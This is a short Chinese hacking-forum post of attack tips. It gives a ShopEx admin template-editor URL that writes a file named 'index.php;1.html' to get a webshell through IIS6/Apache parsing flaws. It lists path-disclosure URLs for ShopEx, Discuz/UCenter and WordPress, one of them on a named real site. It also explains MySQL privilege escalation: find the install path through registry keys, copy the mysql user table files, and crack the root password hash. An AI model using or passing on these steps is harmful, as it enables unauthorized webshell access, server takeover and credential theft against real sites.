shopex 后台拿shell 最新

转来的，然后修改了下

http://localhost/shopadmin/index.php#ctl=system/template&act=editor&p[0]=purple&p[1]=index.php;1.html


themes/purple/红色字体   ’阿帕奇和IIS6.0 你们懂的


http://nbasishop.com/install/svinfo.php?phpinfo=true  phpinfo  爆路径。。


DZ 爆路径

ucenter\control\admin\db.php  

uc_server\control\admin\db.php    ’这东西说鸡肋也鸡肋，不管有时候还是能用上的

WP 爆路径

wp-admin/includes/admin.php    ’ 同上。。。


还有一些私藏的提权思路

mysql data 下的 mysql  root 用户 大家都懂得，这里想几个思路而已 希望大家别ban我。。


找 mysql 路径 除了 找程序里面的快捷键 其实还有注册表查找

这里丢给大家路径


HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\Location


HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\   ’这是找星外找出来的， 其他的自己找把，

user 表 三个文件下载过来后，建议用wamp 架设 环境，放到mysql 下的 data ，新建一个。。

然后用 phpmyadmin 查看  root密码 直接去 cmd5 去破解去把

你们懂的   ’ 写给小菜看的，大牛飘走

作者：Knife